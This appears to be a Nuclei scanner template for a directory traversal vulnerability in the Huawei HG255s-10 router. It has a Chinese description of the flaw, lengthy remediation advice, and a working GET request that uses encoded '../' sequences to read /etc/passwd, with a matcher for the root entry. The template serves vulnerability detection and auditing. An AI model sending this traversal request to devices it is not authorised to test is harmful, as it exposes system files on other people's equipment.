id: huawei-hg255s-lfi
info:
  name: Huawei HG255s - Directory Traversal
  author:
  - l0ne1y
  description: |-
    华为HG255s产品目录遍历
    Huawei HG255s-10是中国华为（Huawei）公司的一款无线路由器产品。

    Huawei HG255s-10 V100R001C163B025SP02版本中存在路径遍历漏洞，该漏洞源于程序未能充分的验证接收到的HTTP请求。远程攻击者可利用该漏洞在未经身份验证的情况下访问设备上的本地文件。
  severity: medium
  remediation: "官方修复方案：\n1、建议用户到官方获取最新补丁或者最新版本程序：\nhttp://www.huawei.com/cn/psirt/security-notices/2017/huawei-sn-20170911-01-hg255s-cn\n\n临时修复方案：\n1、系统开发阶段的防御，在系统开发阶段应充分考虑系统的安全性，对目录遍历漏洞来说，需对用户提交的内容进行严格的过滤，这里主要指过滤目录跳转符，字符截断符，dir命令等。\n2、系统运行阶段的防御，系统运维人员需有强烈的安全意识，他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说，部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞，尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外，还应该合理配置web服务器（禁止目录浏览，分配好目录权限等）并积极关注所使用的各种软件和应用的版本发布情况，及时升级新的软件版本。'\n3、服务器配置，为更好的保护系统安全，实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动，都需要严格遵循变更管理流程，做到执行人、执行时间、执行对象和具体改动均记录在案，并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统，可以在测试环境中调试完成后再更新生产系统，以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统，而且需要保存调试信息时，应避免将调试信息直接保存到服务器本地，同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n
    \ 1）IIS：打开 IIS 管理器，然后导航至您要管理的级别；在“功能视图”中，双击“目录浏览”；在“操作”窗格中，选择“目录浏览”功能，单击“禁用”。\n
    \ 2）Nginx：找到Nginx配置文件中的“autoindex”，设置为“off”，然后重启Nginx。\n  3）Apache：修配置文件httpd.conf，把：Options
    Indexes FollowSymLinks 改为：Options -Indexes FollowSymLinks ，然后重启Apache。\n  4）Tomcat：在应用的WEB-INF目录找到web.xml配置文件，将“listings”参数的初始化值设置为“false”，然后重启Tomcat。
    \ \n4、安全设备的防御，进行目录遍历攻击时，攻击者基本都会使用目录跳转符，同时可能配合使用字符截断符，dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符，字符截断符，以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞，同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。"
requests:
- matchers:
  - type: regex
    regex:
    - root:[x*]:0:0
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
  method: GET
